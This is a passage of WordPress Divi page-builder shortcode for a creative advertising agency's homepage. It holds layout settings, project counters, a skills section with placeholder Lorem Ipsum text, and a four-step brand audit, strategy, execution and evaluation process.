image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Best Advertising agency\" title_text=\"best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" 